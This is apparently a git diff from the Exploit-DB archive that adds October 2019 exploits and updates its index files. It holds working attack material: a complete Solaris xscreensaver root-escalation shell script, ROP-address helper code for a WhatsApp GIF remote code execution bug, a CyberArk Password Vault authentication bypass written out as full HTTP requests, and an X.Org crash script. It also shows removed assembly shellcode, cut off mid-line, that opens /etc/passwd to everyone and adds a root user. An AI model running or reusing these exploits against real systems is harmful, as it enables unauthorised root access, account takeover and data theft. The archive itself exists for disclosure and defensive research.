diff --git a/exploits/android/remote/47515.cpp b/exploits/android/remote/47515.cpp new file mode 100644 index 000000000..9ab06c349 --- /dev/null +++ b/exploits/android/remote/47515.cpp @@ -0,0 +1,109 @@ +# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution +# Date: 2019-10-16 +# Exploit Author: Valerio Brussani (@val_brux) +# Vendor Homepage: https://www.whatsapp.com/ +# Version: < 2.19.244 +# Tested on: Whatsapp 2.19.216 +# CVE: CVE-2019-11932 +# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/ +# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp +# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/) + +/* +* +* Introduction +* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability. +* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp +* +*/ + +#include +#include +#include +#include + +typedef uint8_t byte; +char *gadget_p; +void* libc,* lib; + +//dls iteration for rop +int dl_callback(struct dl_phdr_info *info, size_t size, void *data) +{ + int j; + const char *base = (const char *)info->dlpi_addr; + for (j = 0; j < info->dlpi_phnum; j++) { + const ElfW(Phdr) *phdr = &info->dlpi_phdr[j]; + if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) { + gadget_p = (char *) base + phdr->p_vaddr; + return 1; + } + } + return 0; +} + +//system address +void* get_system_address(){ + libc = dlopen("libc.so",RTLD_GLOBAL); + void* address = dlsym( libc, "system"); + return address; +} + +//rop gadget address +void get_gadget_lib_base_address() { + lib = dlopen("libhwui.so",RTLD_GLOBAL); + dl_iterate_phdr(dl_callback, NULL); +} + +//search gadget +long search_for_gadget_offset() { + char *buffer; + long filelen; + char curChar; + long pos = 0; int curSearch = 0; + //reading file + FILE* fd = fopen("/system/lib64/libhwui.so","rb"); + fseek(fd, 0, SEEK_END); + filelen = ftell(fd); + rewind(fd); + buffer = (char *)malloc((filelen+1)*sizeof(char)); + fread(buffer, filelen, 1, fd); + fclose(fd); + //searching for bytes + byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6}; + while(pos <= filelen){ + curChar = buffer[pos];pos++; + if(curChar == g1[curSearch]){ + curSearch++; + if(curSearch > 11){ + curSearch = 0; + pos-=12; + break; + } + } + else{ + curSearch = 0; + } + } + return pos; +} + +extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) { + char buff[30]; + //system address + snprintf(buff, sizeof(buff), "%p", get_system_address()); + dlclose(libc); + std::string system_string = buff; + return env->NewStringUTF(system_string.c_str()); +} + + + +extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) { + char buff[30]; + get_gadget_lib_base_address(); + //gadget address + snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset()); + dlclose(lib); + std::string system_string = buff; + return env->NewStringUTF(system_string.c_str()); +} \ No newline at end of file diff --git a/exploits/linux/local/47502.py b/exploits/linux/local/47502.py index 881633be8..de1038ec4 100755 --- a/exploits/linux/local/47502.py +++ b/exploits/linux/local/47502.py @@ -1,4 +1,4 @@ -# Exploit Title : sudo 1.8.28 - Security Bypass +# Exploit Title : sudo 1.8.27 - Security Bypass # Date : 2019-10-15 # Original Author: Joe Vennix # Exploit Author : Mohin Paramasivam @@ -6,7 +6,7 @@ # Tested on Linux # Credit : Joe Vennix from Apple Information Security found and analyzed the bug # Fix : The bug is fixed in sudo 1.8.28 -# CVE : N/A +# CVE : 2019-14287 '''Check for the user sudo permissions diff --git a/exploits/linux/local/47507.py b/exploits/linux/local/47507.py new file mode 100755 index 000000000..2afdddec8 --- /dev/null +++ b/exploits/linux/local/47507.py @@ -0,0 +1,43 @@ +# Exploit Title: X.Org X Server 1.20.4 - Local Stack Overflow +# Date: 2019-10-16 +# Exploit Author: Marcelo Vázquez (aka s4vitar) +# Vendor Homepage: https://www.x.org/ +# Version: <= 1.20.4 +# Tested on: Linux +# CVE: CVE-2019-17624 + +#!/usr/bin/python +#coding: utf-8 + +# ************************************************************************ +# * Author: Marcelo Vázquez (aka s4vitar) * +# * X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow) * +# ************************************************************************ + +import sys, time +import ctypes as ct + +from ctypes import cast +from ctypes.util import find_library + +def access_violation(x11, current_display): + keyboard = (ct.c_char * 1000)() + x11.XQueryKeymap(current_display, keyboard) + +if __name__ == '__main__': + + print "\n[*] Loading x11...\n" + time.sleep(2) + + x11 = ct.cdll.LoadLibrary(find_library("X11")) + current_display = x11.XOpenDisplay(None) + + print "[*] Exploiting...\n" + time.sleep(1) + + try: + access_violation(x11, current_display) + + except: + print "\nError...\n" + sys.exit(1) \ No newline at end of file diff --git a/exploits/linux/webapps/47512.txt b/exploits/linux/webapps/47512.txt new file mode 100644 index 000000000..59f3aaec6 --- /dev/null +++ b/exploits/linux/webapps/47512.txt @@ -0,0 +1,80 @@ +# Exploit Title: CyberArk Password Vault 10.6 - Authentication Bypass +# Date: 2019-10-16 +# Author: Daniel Martinez Adan (adon90) +# Vendor: https://www.cyberark.com +# Software: https://www.cyberark.com/products/privileged-account-security-solution/enterprise-password-vault/ +# Collaborator: Luis Buendía (exoticpayloads) +# Version Affected: All + +# It is possible to retrieve a valid cookie by injecting special characters +# in the username field: + +vulnerable parameter: +pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername + +URL: +/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx + +Payload: +%1F + +# Requirements: +# Using a valid ViewState -> if it doesn't work, go to the login panel to +# automatically generate a valid ViewState + + +# Once the valid cookie is obtained, it is posible to perform multiple +# actions in the PasswordVault such us: +# - Retrieving valid user information (Name, Email, Phone number….) +# - DoS +# - DNS enumeration via ip address +# - Possibly deleting users + + +# Login Bypass: + +POST /PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx +Content-Type: application/x-www-form-urlencoded +Content-Length: 2435 +Connection: close +Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca +Upgrade-Insecure-Requests: 1 +__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=gjUPDVmn3eCu84zX77GBo4yZO5ypQSyENJ%2FiPcWTNRTh9MtlLoZ6wvk6nCnoK8MeZfh%2BUA9fqjr80wBpvTA04Xkq8mnhgITyUkAx8PuG09vlGK7CBUxV4PHxPooSWtC%2F2RccxoRIuCucsVDXD27UTCiS4VmDoUWDORoecURYhzV2PH7pXm4XGNtNxeI%2FuLXPvwVYAOYkyUZZloZALalGC54rL24Iery7YR0uYvaC61OmxhCtYVy8zHlu7p2fK%2FUHxGxw3oMKrVJA%2BTCT1%2B5AoO4apN7uA%2BBmJzFhcl9vPrdlgCdu%2F1Ei%2F1O0oVn6BOd%2BhFDHdDbpKAX6xIJAWRfb9%2BGG8qobGKR%2B8Fvhao9hx3oCieBe7BvJL%2Fe9Y61tLtvnoLBHwc7uvG4V1lg5oNcQQeEZTGosZ3xrt3dR3kZe2b6vY0QG8YVlJCv56Xb1Ylr7mI7FIbUbKxbZvIkIPrPlKTvkzUTYGXsBOVXNy9KyAhI2%2B9DVkTFFhp%2FK4uWMCMxVq%2FgRxiEyukUbWvobQxSnUH4aNntJiD0Nmlc6UzwNxfvo%2FUNJx8i0yoPoi4PMomsQTE6%2FjtAQiO9rrf6syMLp2lLqXzQ7u90BqyUB9%2BOkn2C2AKZcir2KyT4vGcVOgEfUiZ7twd%2B4uq4acPpQBNto3zBCtgtKzW5iv8TfSCRuigtaT7Oz5qZvWq7UX%2Bqye9cugocb%2BUbaWVXJqcy0Gkdm0BPrRpiCbkSYqfx%2Fo7fYuDjEnMhXrOwBCUOfHhAcjXHZeeJY%2FKsnRP0Aa2%2BNzCOPimbvVEIq0CzTonYV6WFh1a0aDc0m8Qgchz9RnYR67efSftSQYpPzsBIdp0MsFuZ5AmSPROHH37N0zWVV%2BlVvPfwuSlLFV8d5Kq41KJtucYwenrZMq7lhKcDvaRZz5LOFR71DdrYwZoPloK4BK3yl8w8GaOnyRSQsQ0yW4xj5RbJLKN5J54I2fXDkgIVMJY6dbsztZ2JO%2BTpa5xPjJCIjXTR%2B4pJTqCBWc%2FLJ0xzz6x2EOOP9eMY8RH3GaEdg8Lww66zOzpIyXiOBT0VqyRTDxVd2UnEwJZDqwmcHh1n1nN%2BAQoWk2aJDBev9WiGLSx2GxtipLElZsWTcG5txklqFKB7b5mG2jIsx4%2B%2BRlAz2q6b8YJxKem1FnJwQhTyWZ5%2BgEnEGYIylH%2FsYP2eOcBJr5J7gamu%2FsqF9fZa4AJHxEx%2BspDmzm607z8H2AqOhWRemllMT87KVlCuTKiWw3gj7bhj19KtaE1AwmHid5ISXbt%2F5Gcw4LDvDkmfR1akym0jPGdECSyJG0qbhKiE3abdXESlMCURfX6g1W%2B9i8WZJ4hDtHcsPudD6yhp32NSDa2eVqw%3D%3D&__VIEWSTATEGENERATOR=4EAA75BD&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=yRuqYr%2BEabjm0oMhAb6WmehsX2QOYJhKOP0z9IJq8R2B9Md%2Fi17pZwRXSuLkNN72eNRdEnD%2Fcjr3L3KJLehz7ol6U%2BUONvRqU3dO66PrJIvFj%2BDji4%2FvZeOpLeaI0nY9mSU7%2FdBiOgLzdPnDtNu9G%2BwlR4Z8FdWPayd8UDMqShb%2FmObsqqsoxooNVf8jUFa1X98oKyPHztYNS6ip8fIBl4ksqvsPQhZnc%2Fj%2FniKwWp2GZ%2FmnEhIYMxVVx5tirrB16M4dJqa5ROmxuL%2FJcnW0hqFlAkAycTdep5r0nvN1kXXrIco4RhE52ZbP9yKpr5%2FOyVASLr42dCgOSKXcgkFL1A%3D%3D&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtUsername=%1F&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AtxtPassword=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3AbtnLogon=Sign+in&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword2Hidden=&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3APasswordHidden=admin&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ANewPassword1Hidden=&AuthModuleUsed=radius&pvBody%3APageTemplate%3AinnerHolder%3ActrlLogon%3ASkipChangePwd= + + +# User Information: + +POST /PasswordVault/services/PrivilegedAccountAccess.asmx/GetUserDetails HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx +Connection: close +Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109 +Upgrade-Insecure-Requests: 1 +Content-Type: application/json +Content-Length: 28 +{"userName":"administrator"} + + +# Resolve DNS / DoS + +GET /PasswordVault/ResolveMachineAddress.aspx?data=&moreinfo=127.0.0.1 HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +CAAjax: adon90 +Referer: https://TARGET/PasswordVault/logon.aspx?ReturnUrl=%2fPasswordVault%2fdefault.aspx +Connection: close +Cookie: CA22222=; CA11111=; CA55555=; CA33333=; mobileState=Desktop; __cfduid=d1813e86e4633e4e19945e449038e4f7d1571219978; ASP.NET_SessionId=svcespyi2rswvxcj1wn100ca;6a5a355a-0547-40ce-9770-fc22d1f3bbea=F538D6D97C6816BC6B22F3685B502B7F0ADA08D2D672995205A3C9E00DAA41E2B679ABAEF1FFD6E6F6DB48F3BA71DA768CA995110FA093634502838D8B4C9533851442A9EE06A041FB7631E2630CDE9F79590C6FDF4E67702F70144FBBD75C75D03B5F70A50EA7F31DFFAB6A81923EF27423A9A419A72E956A76C70E5667A2B1617201BD9168B6CD125EADA08D5B81F77C3224287849EFF258172CC2D51CDF1A9C064BB9F7E4C2450ACE8954B74DE109 +Upgrade-Insecure-Requests: 1 \ No newline at end of file diff --git a/exploits/php/webapps/47505.txt b/exploits/php/webapps/47505.txt new file mode 100644 index 000000000..2312093f8 --- /dev/null +++ b/exploits/php/webapps/47505.txt @@ -0,0 +1,62 @@ +# Exploit Title: Express Accounts Accounting 7.02 - Persistent Cross-Site Scripting +# Exploit Author: Debashis Pal +# Date: 2019-10-16 +# Vendor Homepage: https://www.nchsoftware.com +# Source: https://www.nchsoftware.com/accounting/index.html +# Version: Express Accounts Accounting v7.02 +# CVE : N/A +# Tested on: Windows 7 SP1(32bit) + +# About Express Accounts Accounting v7.02 +========================================= +Express Accounts is professional business accounting software, perfect for small businesses. + +# Vulnerability +================ +Persistent Cross site scripting (XSS). + +# PoC +====== + +1. Login as authenticated unprivileged user to Express Accounts Accounting v7.02 web enable service i.e http://A.B.C.D:98 [Default installation]. +2. Under "Invoices" , Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put +Save the change. + +or + +Under "Sales Orders" +Sales Orders -> view Orders -> Add New Order -> New Sales Order ->Customer: Field put +Save the change. + +or + +Under "Items" +Items -> Add new item-> Item field: put +Save the change. + +or + +Under "Customers" +Customers -> Add New Customer -> Customer Name: put +Save the change. + +or + +Under "Quotes" +Quotes -> View Quotes -> Add New Quote -> Customer: put +Save the change. + +3. Login in authenticated privileged or unprivileged user to Express Accounts v7.02 web enable service and visit any of Invoices/Sales Orders/Items/Customers/Quotes section, Persistent XSS payload will execute. + +# Disclosure Timeline +====================== +Vulnerability Discover Date: 15-Sep-2019. +Vulnerability notification to vendor via vendor provided web form: 15-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds. +Submit exploit-db : 16-Oct-2019. + + +# Disclaimer +============= +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. +The author prohibits any malicious use of security related information or exploits by the author or elsewhere. \ No newline at end of file diff --git a/exploits/solaris/local/47509.txt b/exploits/solaris/local/47509.txt new file mode 100644 index 000000000..3edf18c11 --- /dev/null +++ b/exploits/solaris/local/47509.txt @@ -0,0 +1,81 @@ +# Exploit Title: Solaris xscreensaver 11.4 - Privilege Escalation +# Date: 2019-10-16 +# Exploit Author: Marco Ivaldi +# Vendor Homepage: https://www.oracle.com/technetwork/server-storage/solaris11/ +# Version: Solaris 11.x +# Tested on: Solaris 11.4 and 11.3 X86 +# CVE: N/A + +#!/bin/sh + +# +# raptor_xscreensaver - Solaris 11.x LPE via xscreensaver +# Copyright (c) 2019 Marco Ivaldi +# +# Exploitation of a design error vulnerability in xscreensaver, as +# distributed with Solaris 11.x, allows local attackers to create +# (or append to) arbitrary files on the system, by abusing the -log +# command line switch introduced in version 5.06. This flaw can be +# leveraged to cause a denial of service condition or to escalate +# privileges to root. This is a Solaris-specific vulnerability, +# caused by the fact that Oracle maintains a slightly different +# codebase from the upstream one (CVE-2019-3010). +# +# "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs +# "Good hackers force luck." -- ~A. +# +# This exploit targets the /usr/lib/secure/ directory in order +# to escalate privileges with the LD_PRELOAD technique. The +# implementation of other exploitation vectors, including those +# that do not require gcc to be present on the target system, is +# left as an exercise to fellow UNIX hackers;) +# +# Usage: +# raptor@stalker:~$ chmod +x raptor_xscreensaver +# raptor@stalker:~$ ./raptor_xscreensaver +# [...] +# Oracle Corporation SunOS 5.11 11.4 Aug 2018 +# root@stalker:~# id +# uid=0(root) gid=0(root) +# root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.* +# +# Vulnerable platforms: +# Oracle Solaris 11 X86 [tested on 11.4 and 11.3] +# Oracle Solaris 11 SPARC [untested] +# + +echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver" +echo "Copyright (c) 2019 Marco Ivaldi " +echo + +# prepare the payload +echo "int getuid(){return 0;}" > /tmp/getuid.c +gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc +if [ $? -ne 0 ]; then + echo "error: problem compiling the shared library, check your gcc" + exit 1 +fi + +# check the architecture +LOG=/usr/lib/secure/getuid.so +file /bin/su | grep 64-bit >/dev/null 2>&1 +if [ $? -eq 0 ]; then + LOG=/usr/lib/secure/64/getuid.so +fi + +# start our own xserver +# alternatively we can connect back to a valid xserver (e.g. xquartz) +/usr/bin/Xorg :1 & + +# trigger the bug +umask 0 +/usr/bin/xscreensaver -display :1 -log $LOG & +sleep 5 + +# clean up +pkill -n xscreensaver +pkill -n Xorg + +# LD_PRELOAD-fu +cp /tmp/getuid.so $LOG +LD_PRELOAD=$LOG su - \ No newline at end of file diff --git a/exploits/windows/local/47504.txt b/exploits/windows/local/47504.txt new file mode 100644 index 000000000..ca735fba4 --- /dev/null +++ b/exploits/windows/local/47504.txt @@ -0,0 +1,24 @@ +# Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path +# Author: Luis MedinaL +# Date: 2019-10-15 +# Vendor Homepage: https://www.adaware.com/ +# Software Link : https://www.adaware.com/antivirus +# Version : 2.3.4.7 +# Tested on: Microsoft Windows 10 Pro x64 ESP + +# Description: +# Lavasoft 2.3.4.7 installs LavasoftTcpService as a service with an unquoted service path + +C:\Users\Luis ML>sc qc LavasoftTcpService +[SC] QueryServiceConfig CORRECTO + +NOMBRE_SERVICIO: LavasoftTcpService + TIPO : 10 WIN32_OWN_PROCESS + TIPO_INICIO : 2 AUTO_START + CONTROL_ERROR : 1 NORMAL + NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe + GRUPO_ORDEN_CARGA : + ETIQUETA : 0 + NOMBRE_MOSTRAR : LavasoftTcpService + DEPENDENCIAS : RPCSS + NOMBRE_INICIO_SERVICIO: LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/47506.txt b/exploits/windows/local/47506.txt new file mode 100644 index 000000000..2837e24c9 --- /dev/null +++ b/exploits/windows/local/47506.txt @@ -0,0 +1,23 @@ +# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path +# Date : 2019-10-15 +# Exploit Author : Cakes +# Vendor: Zilab Software Inc +# Version : Zilab Remote Console Server 3.2.9 +# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support +# Tested on Windows 10 +# CVE : N/A + + +C:\Users\Administrator>sc qc zrcs +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: zrcs + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Zilab Remote Console Server + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/47508.txt b/exploits/windows/local/47508.txt new file mode 100644 index 000000000..45e551cb7 --- /dev/null +++ b/exploits/windows/local/47508.txt @@ -0,0 +1,22 @@ +# Exploit Title : LiteManager 4.5.0 - 'romservice' Unquoted Serive Path +# Date : 2019-10-15 +# Exploit Author : Cakes +# Vendor: LiteManager Team +# Version : LiteManager 4.5.0 +# Software: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support +# Tested on Windows 10 +# CVE : N/A + +c:\>sc qc romservice +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: romservice + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\LiteManagerFree - Server\ROMServer.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : LiteManagerTeam LiteManager + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/exploits/windows/local/47510.txt b/exploits/windows/local/47510.txt new file mode 100644 index 000000000..994aa1c24 --- /dev/null +++ b/exploits/windows/local/47510.txt @@ -0,0 +1,23 @@ +# Exploit Title : Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path +# Date : 2019-10-15 +# Exploit Author : Cakes +# Vendor: LiteManager Team +# Version : LiteManager 4.5.0 +# Software: http://html.tucows.com/preview/518015/Mikogo?q=remote+support +# Tested on Windows 10 +# CVE : N/A + + +c:\>sc qc Mikogo-Service +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Mikogo-Service + TYPE : 110 WIN32_OWN_PROCESS (interactive) + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Users\Administrator\AppData\Roaming\Mikogo\Mikogo-Service.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Mikogo-Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2a21ceb3f..0f9307dfb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10716,8 +10716,14 @@ id,file,description,date,author,type,platform,port 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux, 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows, 47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows, -47502,exploits/linux/local/47502.py,"sudo 1.8.28 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux, +47502,exploits/linux/local/47502.py,"sudo 1.2.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux, 47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows, +47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows, +47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows, +47507,exploits/linux/local/47507.py,"X.Org X Server 1.20.4 - Local Stack Overflow",2019-10-16,s4vitar,local,linux, +47508,exploits/windows/local/47508.txt,"LiteManager 4.5.0 - 'romservice' Unquoted Serive Path",2019-10-16,cakes,local,windows, +47509,exploits/solaris/local/47509.txt,"Solaris xscreensaver 11.4 - Privilege Escalation",2019-10-16,"Marco Ivaldi",local,solaris, +47510,exploits/windows/local/47510.txt,"Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path",2019-10-16,cakes,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17716,6 +17722,7 @@ id,file,description,date,author,type,platform,port 47456,exploits/windows/remote/47456.rb,"DOUBLEPULSAR - Payload Execution and Neutralization (Metasploit)",2019-10-02,Metasploit,remote,windows, 47472,exploits/windows/remote/47472.py,"freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow",2019-10-07,"Chet Manly",remote,windows, 47500,exploits/linux/remote/47500.py,"Podman & Varlink 1.5.1 - Remote Code Execution",2019-10-15,"Jeremy Brown",remote,linux, +47515,exploits/android/remote/47515.cpp,"Whatsapp 2.19.216 - Remote Code Execution",2019-10-16,"Valerio Brussani",remote,android, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41832,3 +41839,5 @@ id,file,description,date,author,type,platform,port 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python, 47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php, 47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php, +47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php, +47512,exploits/linux/webapps/47512.txt,"CyberArk Password Vault 10.6 - Authentication Bypass",2019-10-16,"Daniel Martinez Adan",webapps,linux, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 1d326af12..efbb98d73 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1004,4 +1004,6 @@ id,file,description,date,author,type,platform 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm -47481,shellcodes/linux/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux +47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux +47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux +47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux diff --git a/shellcodes/linux/47481.c b/shellcodes/linux/47481.c deleted file mode 100644 index b240a8e6a..000000000 --- a/shellcodes/linux/47481.c +++ /dev/null @@ -1,105 +0,0 @@ -# Exploit Title: Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) -# Date: 2019-10-05 -# Exploit Author: sagar.offsec (VL43CK) -# Guided by: Touhid M.Shaikh -# Designation: Security Consultant at SecureLayer7 -# Website: https://www.sagaroffsec.com -# Tested on: Ubuntu i386 GNU/LINUX -# Shellcode Length: 59 - -----------------------(DESCRIPTION)---------------------------- - -This shellcode will first change /etc/passwd permission to 777 and then -add a user "vl43ck" in it with password "test" with root permissions. - -----------------------(SHELLCODE DUMP)------------------------- -global _start - -section .text -_start: - - ;chmod 777 /etc/passwd - - xor eax, eax - push eax - - push 0x64777373 - push 0x61702f63 - push 0x74652f2f - xor ebx, ebp - lea ebx, [esp] - - xor ecx, ecx - mov cx, 0x1ff - - mov al, 0xf - int 0x80 - - ;add user in /etc/passwd - - ;open /etc/passwd - - xor eax, eax - mov al, 5 - xor ecx, ecx - mov cx, 2001Q - int 0x80 - - ;write into /etc/passwd - - xor ebx, ebx - mov ebx, eax - - jmp short call_write -write: - pop ecx - - xor eax, eax - xor edx, edx - mov dx, 132 - mov al, 4 - int 0x80 - - ; close /etc/passwd - - xor eax, eax - mov al, 6 - int 0x80 - - ;exit gracefully - - push eax - xor eax, eax - mov al, 1 - xor 